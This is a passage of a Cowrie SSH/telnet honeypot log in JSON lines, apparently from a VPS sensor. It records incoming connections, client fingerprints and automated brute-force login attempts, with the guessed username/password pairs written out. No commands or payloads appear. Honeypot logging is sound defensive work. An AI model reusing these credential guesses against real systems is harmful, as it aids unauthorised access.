v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:27:08.100706Z","src_ip":"185.93.89.7","session":"d051d9e7a273"}
{"eventid":"cowrie.login.failed","username":"index","password":"222222","message":"login attempt [index/222222] failed","sensor":"my-vps","timestamp":"2025-08-28T09:27:08.152788Z","src_ip":"185.93.89.7","session":"d051d9e7a273"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:27:09.209439Z","src_ip":"185.93.89.7","session":"d051d9e7a273"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42462,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a015d85903e","protocol":"ssh","message":"New connection: 51.79.164.132:42462 (1.2.3.4:22) [session: 1a015d85903e]","sensor":"my-vps","timestamp":"2025-08-28T09:27:15.965915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:27:16.112406Z","src_ip":"51.79.164.132","session":"1a015d85903e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:27:16.819520Z","src_ip":"51.79.164.132","session":"1a015d85903e"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:27:18.222440Z","src_ip":"51.79.164.132","session":"1a015d85903e"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:27:19.744969Z","src_ip":"51.79.164.132","session":"1a015d85903e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40544,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f0f44eee61a","protocol":"ssh","message":"New connection: 185.93.89.7:40544 (1.2.3.4:22) [session: 3f0f44eee61a]","sensor":"my-vps","timestamp":"2025-08-28T09:27:32.627043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:27:32.627937Z","src_ip":"185.93.89.7","session":"3f0f44eee61a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:27:32.646314Z","src_ip":"185.93.89.7","session":"3f0f44eee61a"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwe123","message":"login attempt [index/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:27:32.683858Z","src_ip":"185.93.89.7","session":"3f0f44eee61a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:27:33.741323Z","src_ip":"185.93.89.7","session":"3f0f44eee61a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52214,"dst_ip":"1.2.3.4","dst_port":22,"session":"e14b104984d1","protocol":"ssh","message":"New connection: 212.227.125.160:52214 (1.2.3.4:22) [session: e14b104984d1]","sensor":"my-vps","timestamp":"2025-08-28T09:27:40.985621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:27:40.987276Z","src_ip":"212.227.125.160","session":"e14b104984d1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:27:41.071784Z","src_ip":"212.227.125.160","session":"e14b104984d1"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T09:27:41.486724Z","src_ip":"212.227.125.160","session":"e14b104984d1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":50112,"dst_ip":"1.2.3.4","dst_port":22,"session":"5162283a8098","protocol":"ssh","message":"New connection: 51.79.164.132:50112 (1.2.3.4:22) [session: 5162283a8098]","sensor":"my-vps","timestamp":"2025-08-28T09:27:42.458853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:27:42.580040Z","src_ip":"51.79.164.132","session":"5162283a8098"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:27:42.581566Z","src_ip":"212.227.125.160","session":"e14b104984d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:27:43.229040Z","src_ip":"51.79.164.132","session":"5162283a8098"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:27:44.409778Z","src_ip":"51.79.164.132","session":"5162283a8098"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:27:46.055760Z","src_ip":"51.79.164.132","session":"5162283a8098"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56153,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff3021edcaa1","protocol":"ssh","message":"New connection: 212.227.235.229:56153 (1.2.3.4:22) [session: ff3021edcaa1]","sensor":"my-vps","timestamp":"2025-08-28T09:27:47.483672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.1","message":"Remote SSH version: SSH-2.0-libssh-0.1","sensor":"my-vps","timestamp":"2025-08-28T09:27:47.850905Z","src_ip":"212.227.235.229","session":"ff3021edcaa1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:27:48.218448Z","src_ip":"212.227.235.229","session":"ff3021edcaa1"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":60794,"dst_ip":"1.2.3.4","dst_port":22,"session":"93217d9210ea","protocol":"ssh","message":"New connection: 185.93.89.7:60794 (1.2.3.4:22) [session: 93217d9210ea]","sensor":"my-vps","timestamp":"2025-08-28T09:27:57.046290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:27:57.047263Z","src_ip":"185.93.89.7","session":"93217d9210ea"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:27:57.067397Z","src_ip":"185.93.89.7","session":"93217d9210ea"}
{"eventid":"cowrie.login.failed","username":"index","password":"131313","message":"login attempt [index/131313] failed","sensor":"my-vps","timestamp":"2025-08-28T09:27:57.122420Z","src_ip":"185.93.89.7","session":"93217d9210ea"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:27:58.146159Z","src_ip":"185.93.89.7","session":"93217d9210ea"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":46722,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1af17bbc355","protocol":"ssh","message":"New connection: 51.79.164.132:46722 (1.2.3.4:22) [session: d1af17bbc355]","sensor":"my-vps","timestamp":"2025-08-28T09:28:08.788899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:28:08.895026Z","src_ip":"51.79.164.132","session":"d1af17bbc355"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:28:09.312836Z","src_ip":"51.79.164.132","session":"d1af17bbc355"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-28T09:28:10.878263Z","src_ip":"51.79.164.132","session":"d1af17bbc355"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:28:12.443669Z","src_ip":"51.79.164.132","session":"d1af17bbc355"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37526,"dst_ip":"1.2.3.4","dst_port":22,"session":"b615e4e3c355","protocol":"ssh","message":"New connection: 185.93.89.7:37526 (1.2.3.4:22) [session: b615e4e3c355]","sensor":"my-vps","timestamp":"2025-08-28T09:28:23.420081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:28:23.427591Z","src_ip":"185.93.89.7","session":"b615e4e3c355"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:28:23.439868Z","src_ip":"185.93.89.7","session":"b615e4e3c355"}
{"eventid":"cowrie.login.failed","username":"index","password":"asdfasdf","message":"login attempt [index/asdfasdf] failed","sensor":"my-vps","timestamp":"2025-08-28T09:28:23.503490Z","src_ip":"185.93.89.7","session":"b615e4e3c355"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:28:24.523418Z","src_ip":"185.93.89.7","session":"b615e4e3c355"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:28:32.077625Z","src_ip":"87.121.84.168","session":"22dce9fead70"}
{"eventid":"cowrie.session.closed","duration":180.07755208015442,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:28:32.082291Z","src_ip":"87.121.84.168","session":"22dce9fead70"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40718,"dst_ip":"1.2.3.4","dst_port":22,"session":"0099824ecd75","protocol":"ssh","message":"New connection: 51.79.164.132:40718 (1.2.3.4:22) [session: 0099824ecd75]","sensor":"my-vps","timestamp":"2025-08-28T09:28:34.581383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:28:34.661882Z","src_ip":"51.79.164.132","session":"0099824ecd75"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:28:35.336113Z","src_ip":"51.79.164.132","session":"0099824ecd75"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-28T09:28:36.717837Z","src_ip":"51.79.164.132","session":"0099824ecd75"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:28:38.160727Z","src_ip":"51.79.164.132","session":"0099824ecd75"}
{"eventid":"cowrie.session.connect","src_ip":"111.229.194.251","src_port":42216,"dst_ip":"1.2.3.4","dst_port":23,"session":"035a70da4dff","protocol":"telnet","message":"New connection: 111.229.194.251:42216 (1.2.3.4:23) [session: 035a70da4dff]","sensor":"my-vps","timestamp":"2025-08-28T09:28:45.576259Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":46804,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3c4880d134a","protocol":"ssh","message":"New connection: 193.32.162.145:46804 (1.2.3.4:22) [session: b3c4880d134a]","sensor":"my-vps","timestamp":"2025-08-28T09:28:46.908417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:28:46.909127Z","src_ip":"193.32.162.145","session":"b3c4880d134a"}
